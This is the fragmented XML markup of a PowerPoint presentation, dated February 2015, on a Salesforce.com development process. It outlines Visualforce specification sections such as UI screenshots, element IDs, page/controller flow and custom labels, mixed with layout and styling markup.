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xls" ContentType="application/vnd.ms-exce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1" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId84"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId85"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="345" r:id="rId3"/>
    <p:sldId id="473" r:id="rId4"/>
    <p:sldId id="472" r:id="rId5"/>
    <p:sldId id="387" r:id="rId6"/>
    <p:sldId id="388" r:id="rId7"/>
    <p:sldId id="357" r:id="rId8"/>
    <p:sldId id="389" r:id="rId9"/>
    <p:sldId id="390" r:id="rId10"/>
    <p:sldId id="391" r:id="rId11"/>
    <p:sldId id="450" r:id="rId12"/>
    <p:sldId id="451" r:id="rId13"/>
    <p:sldId id="429" r:id="rId14"/>
    <p:sldId id="392" r:id="rId15"/>
    <p:sldId id="393" r:id="rId16"/>
    <p:sldId id="394" r:id="rId17"/>
    <p:sldId id="395" r:id="rId18"/>
    <p:sldId id="396" r:id="rId19"/>
    <p:sldId id="452" r:id="rId20"/>
    <p:sldId id="453" r:id="rId21"/>
    <p:sldId id="397" r:id="rId22"/>
    <p:sldId id="398" r:id="rId23"/>
    <p:sldId id="474" r:id="rId24"/>
    <p:sldId id="475" r:id="rId25"/>
    <p:sldId id="477" r:id="rId26"/>
    <p:sldId id="440" r:id="rId27"/>
    <p:sldId id="442" r:id="rId28"/>
    <p:sldId id="443" r:id="rId29"/>
    <p:sldId id="449" r:id="rId30"/>
    <p:sldId id="476" r:id="rId31"/>
    <p:sldId id="428" r:id="rId32"/>
    <p:sldId id="399" r:id="rId33"/>
    <p:sldId id="400" r:id="rId34"/>
    <p:sldId id="432" r:id="rId35"/>
    <p:sldId id="430" r:id="rId36"/>
    <p:sldId id="431" r:id="rId37"/>
    <p:sldId id="448" r:id="rId38"/>
    <p:sldId id="436" r:id="rId39"/>
    <p:sldId id="437" r:id="rId40"/>
    <p:sldId id="433" r:id="rId41"/>
    <p:sldId id="447" r:id="rId42"/>
    <p:sldId id="454" r:id="rId43"/>
    <p:sldId id="455" r:id="rId44"/>
    <p:sldId id="456" r:id="rId45"/>
    <p:sldId id="457" r:id="rId46"/>
    <p:sldId id="459" r:id="rId47"/>
    <p:sldId id="458" r:id="rId48"/>
    <p:sldId id="460" r:id="rId49"/>
    <p:sldId id="427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8" r:id="rId83"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7099300" cy="10234613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N W3"/>
        <a:cs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0"/>
    <a:srgbClr val="517EFD"/>
    <a:srgbClr val="EAEAEA"/>
    <a:srgbClr val="808080"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="B2B2B2"/>
    <a:srgbClr val="DDDDDD"/>
    <a:srgbClr val="0E66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4" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-1296" y="-66"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="28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>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="-2970" y="-114"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3223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BFD3-B7D6-4D4A-88B1-8241B991BB33}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>11/02/2015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B3840-0FE8-41EB-9053-CA972376E0C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itchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B16EED4B-CEA1-4189-A39F-F34867195F0B}" type="datetimeFigureOut">
              <a:rPr lang="en-US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itchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{75E36128-E392-4572-A57B-29A07818272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72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98FB01E8-6CE2-4AA5-B5A8-B7978915DFCA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12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7DEA5A67-9B82-47E0-92AF-7BC122924388}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/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DF60DE34-8FE9-4865-8D07-071A6FF74C41}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>14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2FF399D6-CD9B-4839-BBAA-3FE04D1DAB55}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>15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7B9DBA23-9BE8-4E40-BEFE-FAF6DDBBD619}" type="slidenum">
              <a:rPr lang="en-US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7642F20F-77F9-43B2-BAFB-DFD22E404506}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>18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B98D4113-8D71-4ADB-AEED-F36656202348}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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6F9BFCAF-955C-44DF-AB62-6AA78278029D}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>20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FACCE6BE-D657-4B75-8502-9007901F454D}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21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AFDFF9A8-B458-4CC9-A284-8C693E37DBA9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25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4CDEE94C-1DFA-47DB-9125-45201D076293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26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0E6DE86C-38E6-43F3-B1A3-1A80D7754BE3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27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072F5696-B656-4FAC-B0E7-2D5E35223ACB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28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51F75AA1-59B5-4779-935D-A83612049206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30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B570C202-5E6E-41B7-9C32-B3A570287D71}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>31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B897F80D-14D8-4B8E-97EF-BAAA2F9E8290}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>32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6F930E5B-F487-45CB-AF90-29C4656A34D2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33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DC26B478-1972-4C1D-B8F0-1913ABA64E0D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34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4B40E16C-C5BB-43B4-B597-4763D018EE48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35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BC1AED5F-EAF1-4788-9740-1637D78AF6F2}" type="slidenum">
              <a:rPr lang="en-US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E1694AC2-1F00-4EA3-BD42-A1FC31F1DF2D}" type="slidenum">
              <a:rPr lang="en-AU" sz="1300">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU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43B7AB3D-16D5-46F7-9DD2-74FF5446452C}" type="slidenum">
              <a:rPr lang="en-AU" sz="1300">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU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6AED3A8A-D7B0-41C7-89F3-8F62DE24C43B}" type="slidenum">
              <a:rPr lang="en-AU" sz="1300">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU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B3F57543-2877-41B6-972C-F6F0EA7BC73D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39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A7C09EBC-94A0-4326-8F68-6C1CF5A4F859}" type="slidenum">
              <a:rPr lang="en-AU" sz="1300">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU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7E90C384-4971-4B84-935C-010EDADFF27D}" type="slidenum">
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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E9859592-23C0-4511-A34C-F7E53B4AEDE1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48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5000" cy="4286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5486400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5000" cy="42862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5486400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xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="460533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Just copy/paste the project planning focused on the development (dev, UAT, deployment…)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F1476EB3-6E8E-4B6A-88AC-5B263899689D}" type="slidenum">
              <a:rPr lang="en-US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C5DE6AC1-B791-4E3B-A2DB-8CFAFFFBF7C9}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>56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ED21CD69-1DB5-43F6-9715-2FFB79FD360C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>57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523875"/>
            <a:ext cx="5716588" cy="42878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7988"/>
            <a:ext cx="56388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2269" tIns="46135" rIns="92269" bIns="4613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1B70D2E3-A1D2-441A-A081-0ED62DBB9B56}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>64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2DA39D26-1BA9-40FA-99C2-317B47414485}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>65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DCAD1AAF-2344-4B10-BBD5-2BB132BBEC91}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/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649E90DC-F2D4-426B-BD25-B17105F7FB63}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>66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520FDDA4-3E76-4044-BFA4-1FE291BB389C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>67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6491AB22-B920-424E-9712-1603E95A398E}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>68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F125EDEF-2A2C-42D4-A026-166DBD129DE9}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>69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111620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E9859592-23C0-4511-A34C-F7E53B4AEDE1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70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4021138" y="9721851"/>
            <a:ext cx="3076575" cy="511175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99038" tIns="49520" rIns="99038" bIns="49520" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D8842268-9B3B-4993-8BF1-E9D038393F39}" type="slidenum">
              <a:rPr lang="en-AU" sz="1300">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU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fld id="{CB80B3BC-9124-4E02-B3BF-F76B9D4A19AB}" type="slidenum">
              <a:rPr lang="en-US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23C93E62-E0C9-4167-92F2-9461185F3DEF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10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r" eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{D2111B06-5588-47B3-9E81-910211DBD1E3}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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5732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7741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858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858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2961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09588" y="1295400"/>
            <a:ext cx="4011612" cy="4343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4013200" cy="4343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140544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cloud_5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6163" y="5827713"/>
            <a:ext cx="159067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bug_red_rgb_lar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463" y="6035675"/>
            <a:ext cx="7127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087D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84400"/>
            <a:ext cx="8036560" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="5400">
                <a:solidFill>
                  <a:srgbClr val="5B8BC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2339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082570" cy="814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4624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4491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7305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42707812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1871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4252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821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9301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8171326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3932387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>
                <a:sym typeface="Arial" pitchFamily="27" charset="0"/>
              </a:rPr>
              <a:t>Cliquez sur l'icône pour ajouter une image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" smtClean="0">
              <a:sym typeface="Arial" pitchFamily="27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19342014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66570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858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858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0038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8947902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958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9807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6650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68461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55688506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>
                <a:sym typeface="Arial" pitchFamily="27" charset="0"/>
              </a:rPr>
              <a:t>Cliquez sur l'icône pour ajouter une image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" smtClean="0">
              <a:sym typeface="Arial" pitchFamily="27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212742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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cliquez pour modifier le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Arial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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cinquième niveau</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym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48600" y="5867400"/>
            <a:ext cx="1082570" cy="814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5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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="354013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6B6B6B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90563" indent="-28575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>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="10906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•"/>
        <a:defRPr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3pPr>
      <a:lvl4pPr marL="15478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–"/>
        <a:defRPr sz="1600"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4pPr>
      <a:lvl5pPr marL="20050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5pPr>
      <a:lvl6pPr marL="24622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6pPr>
      <a:lvl7pPr marL="29194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7pPr>
      <a:lvl8pPr marL="33766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8pPr>
      <a:lvl9pPr marL="38338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125" y="5842000"/>
            <a:ext cx="10890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087D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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cliquez pour modifier le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Arial" pitchFamily="34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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cinquième niveau</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5pPr marL="39688" indent="-39688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27" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="27" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="27" charset="-128"/>
          <a:sym typeface="Arial" pitchFamily="27" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="354013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6B6B6B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90563" indent="-28575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>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="10906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•"/>
        <a:defRPr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3pPr>
      <a:lvl4pPr marL="15478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–"/>
        <a:defRPr sz="1600"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4pPr>
      <a:lvl5pPr marL="2005013" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0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34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34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="24622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6pPr>
      <a:lvl7pPr marL="29194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7pPr>
      <a:lvl8pPr marL="33766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8pPr>
      <a:lvl9pPr marL="3833813" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="120000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="400"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="6B6B6B"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="27" charset="0"/>
        <a:buChar char="»"/>
        <a:defRPr sz="1600">
          <a:solidFill>
            <a:srgbClr val="6B6B6B"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" pitchFamily="2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developerforce.com/index.php/Securit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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/Feuille_Microsoft_Office_Excel_97-20031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sbin@example.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jsmith@example.com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mailto:sbin@example.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jsmith@example.com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Feuille_Microsoft_Office_Excel_97-2003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Feuille_Microsoft_Office_Excel_97-2003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08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42300" cy="1562100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="81279" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;PAD&gt;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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a Salesforce.com development process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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3810000" cy="1108075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="151978"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="74613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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; Jean-Luc Antoine, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sovan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Bin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74613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74613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February 2015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pic>
        <p:nvPicPr>
          <p:cNvPr id="128002" name="Picture 2" descr="D:\Users\JANTOINE\Desktop\pa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191000"/>
            <a:ext cx="2743200" cy="2063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963738" y="965200"/>
            <a:ext cx="5305425" cy="56118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 smtClean="0"/>
              <a:t>UI - Screenshot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Preview of the visualforce page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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UI - Details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Explains what each elements is doing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="100" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="10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UI - IDs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For each element an ID is defined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="10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Context and parameters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Describes the contexts of the page : is it launched from an account button, a system override, … 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Gives all the input that is provided to the page (example : id in the url)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5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Code architecture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smtClean="0"/>
              <a:t>Gives the relationships between the pages, the controllers, the extensions, the classes, the static resources, etc.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2189163"/>
            <a:ext cx="1389063" cy="10429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3363913"/>
            <a:ext cx="1392238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12825"/>
            <a:ext cx="1385888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4540250"/>
            <a:ext cx="1387475" cy="10429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229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00" y="5715000"/>
            <a:ext cx="1397000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0"/>
            <a:ext cx="8839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>
            <a:lvl1pPr marL="39688" indent="-39688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 sz="2000" b="1">
                <a:ea typeface="ヒラギノ角ゴ ProN W6"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;PAD Spec – Document structure 3/4 – Visualforce&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1">
              <a:ea typeface="ヒラギノ角ゴ ProN W6"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W6"/>
              <a:sym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63738" y="1169988"/>
            <a:ext cx="5305425" cy="56118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400" smtClean="0"/>
              <a:t>Flow Page / Controller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200" smtClean="0"/>
              <a:t>Describes all the transactions that can occure between the page and the controller (extension)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>Page description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200" smtClean="0"/>
              <a:t>Finest description of the Page development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>How will you structure your code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3200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>Controller description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200" smtClean="0"/>
              <a:t>Finest description of the Controller development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>How will you structure your code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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z="1400" smtClean="0"/>
              <a:t>Custom Labels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200" smtClean="0"/>
              <a:t>The exact list of all custom labels (and only the required custom labels), with the custom label name, category, english label and other languages labels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1588"/>
            <a:ext cx="1384300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6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2388"/>
            <a:ext cx="1390650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13188"/>
            <a:ext cx="1397000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33988"/>
            <a:ext cx="1371600" cy="1044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04800" y="0"/>
            <a:ext cx="8839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>
            <a:lvl1pPr marL="39688" indent="-39688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 sz="2000" b="1">
                <a:ea typeface="ヒラギノ角ゴ ProN W6"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;PAD Spec – Document structure 4/4 – Visualforce&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1">
              <a:ea typeface="ヒラギノ角ゴ ProN W6"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W6"/>
              <a:sym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09600" y="2184400"/>
